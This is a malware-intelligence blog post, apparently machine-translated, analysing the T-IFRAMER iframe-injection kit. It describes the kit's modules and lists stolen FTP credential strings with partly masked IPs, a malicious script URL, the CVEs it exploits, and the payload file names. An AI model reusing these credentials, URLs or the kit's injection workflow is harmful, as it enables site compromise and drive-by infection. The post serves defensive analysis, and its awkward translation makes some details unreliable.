Skip navigation.
Home

T-IFRAMER. Kit for the injection of malware In-the-Wild

| |

T-IFRAMER is a package that allows you to automate, centralize and manage via http the spread of malicious code via code injection sites violated viral techniques using iframe, and feed a botnet. We then see a screen capture of authentication.

While there is a complex kit allows computer criminals manage the spread of malware via the http protocol type attacks using Drive-by-Download and Drive-by-Injection by inserting iframe tags in web pages violated.

The four key modules: Stats, Manager, Iframes and Injector, and each has the main function to optimize the spread of malware.

The first one (Stats) to manage FTP accounts violated having control over them with the ability to upload files. Thus begins one of the cycles of propagation of malicious code.

The management module has several categories, among which are:

* Iframe accounts. These are pages that have been injected malicious scripts through the iframe tag.
* Not Iframe. FTP accounts are basically violated. In this case, stored until several ftp accounts:

ftp://distribs:softXP @ 193.xxx.xxx.66
ftp://distribs:softXP @ 193.xxx.xxx.66
ftp://tools:softXP @ 193.xxx.xxx.66
ftp://tools : softXP@193.xxx.xxx.66
ftp://tools:softXP @ 193.xxx.xxx.66
ftp://distribs:softXP @ 193.xxx.xxx.66
ftp://NST:124 @ 80. xxx.xxx.179
ftp://NST:124 @ 80.xxx.xxx.179
ftp://NST:124 @ 80.xxx.xxx.179
ftp://NST:124 @ 80.xxx.xxx.179

* Good accounts. Allows you to set which violated ftp accounts are useful or are still active.
* Freehosts accounts. It lists all the ftp violated websites that are hosted on free hosting.
* Unchecked accounts. Accounts that haven't yet been reviewed.

The following screenshots show two of the ftp violated. In each of these can store any kind of information (warez, cracks, pornography, phishing, pedophile material, any type of malware). The first software houses and the second is a mirror to download * NIX based distributions.

Module Manager is itself a panel that allows the administration of each of the above categories, including the ability to directly remove the FTP record.

To this end, these first modules are concerned with everything related to the management of accounts. However, it doesn't end with these and the following modules are more aggressive.

One is the form Iframes. This allows you to set the strategy of attack through iframe tags, hiding it (as usual) in a script. In this case, the script has used as the url information http://flo4.cn/1.txt.

In turn, this url contains reference to another url, but in this case, contains a rough script that contains multiple exploits and malware automatically downloaded.

In this instance, after trying to run the exploit, it redirects the domain http://www.google.ru, which seems manipulates the return of the searches.

Exploits that have are the following:

* CVE-2009-0927 (Adobe getIcon)
* CVE-2008-2463 (Office Snapshot Viewer)
* CVE-2008-2992 (Adobe util.printf overflow)
* CVE-2008-0015 (MsVidCtl Overflow)
* CVE-2007-5659 (Adobe Collab overflow)

Malicious code that are downloaded are:

* ehkruz1.exe. This is a Trojan designed to capture information related to the service WebMoney and to date has a low rate of detection, antivirus detected only 6 engines of 41. The filename is random.
* egiz.pdf. Contains exploit (CVE-2007-5659, CVE-2008-2992 and CVE-2009-0927) with a low detection rate, 7 / 41 (17.08%). Download the binary.
* manual.swf. Contains exploit. Its detection rate is medium-low, 15/41 (36.59%).
* sdfg.jar. Troyan is a downloader with exploit. Its detection rate is meda-low, 14/41 (34.15%).
* ghknpxds.jpg. It contains an exploit. Its detection rate is very low, 4 / 41 (9.76%).

The module Injector is responsible for the actions iframe code injection through the module created earlier, letting you configure a number of parameters to optimize attack, for example, allows you to control PageRank, inject code, clean it if necessary, check the country's hosting and ftp accounts, establish which domains attack (1st and 2nd level, both configurable), configure regular expressions with the names of folders and files common to find in a web server, among others.

Investigating a little more domains involved, obvious that this application is being used as a tool of "support" for a known crimeware and of which we have spoken on this blog, this is the latest Fragus.

That is, the domain "hidden" between the labels iframe redirects to a new URL from which to exploit a battery of artillery trying to achieve with its potentially vulnerable computers, and download the malware responsible for recruiting the zombie.

T-IFRAMER has two distinct groups. On one hand the administration and on the other the attack in addition to obviously continue to fuel the botnet, with which it's clear that those behind this type of crimeware really know what they want and, although the development of the application is very simple, is effective enough to be used by a des botnets more effective today as it's fragus.

Finally, these actions are very similar to those performed by Gumblar (who according to some sources would be of Chinese origin, though I doubt it), and although I can not say that in this case concerned the mechanisms for disseminating Gumblar, especially because in the first instance this kit is of Russian origin (as fragus), there is no doubt that the strategy (together) is very similar.

Is it what many call today Gumblar?

Jorge Mieres
Pistus Malware Intelligence